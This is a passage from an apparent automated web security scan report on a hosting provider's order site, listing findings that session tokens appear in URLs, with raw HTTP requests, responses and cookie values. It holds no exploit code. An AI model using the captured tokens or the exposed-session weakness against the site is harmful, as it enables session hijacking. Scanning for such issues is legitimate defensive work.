Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 14:50:52 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=6aV4uMTIoUVFRS3VrcjhwajcpM2xfWTFIOzUdIR4eHRsdMi8vMjErLjIlJyYlIkc1YVZYZh4gG0s7ZXQ6LS4qKS4qKCspIysiISpiYykcJWx1Oy4vKyovKyksKiQsIyI=; Expires=Fri, 07-Apr-2079 18:04:59 GMT; Path=/
ETag: ad36f49218ed966c510ceb30c0b54c6f
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 36434


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=Home&amp;linkOrigin=Home&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=Home&amp;page=switch&amp;linkOrigin=Home&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.server" rel="button-hd-nav-server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<li class="tabs-home"><a style="background:none;" class="core_button_normal" href="/xml/order/Jumpto;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkId=hd.nav.customerlogin&amp;site=CC.WH.US&amp;origin.page=Home&amp;linkOrigin=Home&amp;linkId=hd.nav.customerlogin" rel="redirectlink-hd-nav-customerlogin">
Customer Login
</a>
...[SNIP]...
<li class="tabs-home"><a class="core_button_normal" href="/xml/order/Contact;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.support" rel="button-hd-nav-support">Support</a>
...[SNIP]...
</table><a class="teaserlink" href="/xml/order/Instant;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static"></a>
...[SNIP]...
<img src="/oneandone_en_common/img/pages/Home/free_6mounths.png" alt="Web Hosting" class="alphapng hostingbox price-stopper-countdown" width="193" height="121"><a class="btn btn-yellow-medium btn-pos-home-top" href="/xml/order/Hosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=weiter" rel="button-weiter"><span>More</span></a><a class="teaserlink" href="/xml/order/Hosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static"></a>
...[SNIP]...
<img src="/oneandone_en_common/img/pages/Home/pr_9_99_diy_free_trial.png" alt="FREE TRIAL then starting at $ 9.99/month" class="alphapng pos-price-doityourself price-stopper" width="89" height="95"><a class="btn btn-yellow-medium btn-pos-home-top" href="/xml/order/Jumpto;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkId=weiter&amp;site=PU.NGH.US&amp;origin.page=Home&amp;page=switch&amp;linkOrigin=Home&amp;linkId=weiter" rel="redirectlink-weiter"><span>More</span></a><a class="teaserlink" href="/xml/order/Jumpto;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkId=weiter&amp;site=PU.NGH.US&amp;origin.page=Home&amp;page=switch&amp;linkOrigin=Home&amp;linkId=weiter" rel="redirectlink-weiter"></a>
...[SNIP]...
<div id="navigation" class="homepos"><a class="core_button_normal" href="/xml/order/sitedesign;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static"><img src="/oneandone_en_common/img/pages/Home/teaser_sitedesign.png" alt="" class="alphapng teaser-sitedesign" width="186" height="191">
...[SNIP]...
<li class="first-item"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkId=hd.nav.mybusinesssite&amp;site=PU.NGH.US&amp;origin.page=Home&amp;page=switch&amp;linkOrigin=Home&amp;linkId=hd.nav.mybusinesssite" rel="redirectlink-hd-nav-mybusinesssite">MyBusiness Site</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">Domains</a></li><li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">Microsoft Hosting</a>
...[SNIP]...
<li class="first-item"><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">Microsoft&reg; Exchange</a>
...[SNIP]...
<li class="first-item"><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">Dynamic Cloud Server</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">Virtual Servers</a>
...[SNIP]...
<li class="first-item"><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">Microsoft&reg; SharePoint&reg;</a>
...[SNIP]...
<li class="first-item"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">eShops</a>
...[SNIP]...
</span><a class="btn btn-blue-medium btn-pos-home" href="/xml/order/Mail;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static"><span>More</span></a><a class="teaserlink" href="/xml/order/Mail;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static"></a>
...[SNIP]...
<li>Choose between <a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">virtual</a> or <a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">dedicated servers</a><br>and <a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">dynamic cloud servers</a>
...[SNIP]...
</span><a class="btn btn-blue-medium btn-pos-home" href="/xml/order/Server;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static"><span>
...[SNIP]...
</span><a class="btn btn-blue-medium btn-pos-home" href="/xml/order/Eshops;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static"><span>More</span></a><a class="teaserlink" href="/xml/order/Eshops;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static"></a>
...[SNIP]...
</span><a class="btn btn-blue-medium btn-pos-home" href="/xml/order/LocalSubmission;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static"><span>More</span></a><a class="teaserlink" href="/xml/order/LocalSubmission;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static"></a>
...[SNIP]...
</p><a class="btn btn-detail-lightblue" href="/xml/order/Sharepoint;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
More
</a>
...[SNIP]...
</p><a class="btn btn-detail-lightblue" href="/xml/order/MsHosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
More
</a>
...[SNIP]...
</p><a rel="height=590, width=665" class="window-open" href="/xml/order/popupGreenPower;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">More...</a>
...[SNIP]...
<br><a rel="height=690, width=737" class="window-open" href="/xml/order/popupWebsiteMagazine;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">More...</a>
...[SNIP]...
<br><a class="core_button_normal" href="/xml/order/TcSpecialOffers;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">Click here</a>
...[SNIP]...
<p><a class="nounderline" href="/links;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">1and1.com</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=Home&amp;linkOrigin=Home&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...

3.72. http://order.1and1.com/xml/order/Hosting

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Hosting

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642626825
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; UT=8Z1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:6:AAABLtRX2K_J5jNaUkl1B0HVVvj*yNyZ:1300642650287; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:37:21 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=0b2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1Mi8yLTAxKis=; Expires=Fri, 07-Apr-2079 20:51:28 GMT; Path=/
ETag: 1c80cdab16ac208079c7642ff888736c
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 59725


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.73. http://order.1and1.com/xml/order/Hosting

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Hosting

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642626825
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; UT=8Z1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:6:AAABLtRX2K_J5jNaUkl1B0HVVvj*yNyZ:1300642650287; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:37:21 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=0b2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1Mi8yLTAxKis=; Expires=Fri, 07-Apr-2079 20:51:28 GMT; Path=/
ETag: 1c80cdab16ac208079c7642ff888736c
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 59725


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=Hosting&amp;linkOrigin=Hosting&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.home" rel="button-hd-nav-home">Home</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=Hosting&amp;page=switch&amp;linkOrigin=Hosting&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.server" rel="button-hd-nav-server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.tab.microsofthosting" rel="button-hd-tab-microsofthosting"><span>
...[SNIP]...
<li class="two-rows"><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
Microsoft<br>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Domaininfo;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">All About Domains</a>
...[SNIP]...
<li class="first-level"><a class="core_button_normal" href="/xml/order/Service;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">Service &amp; Support</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/FirstWebsite;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">First Website</a>
...[SNIP]...
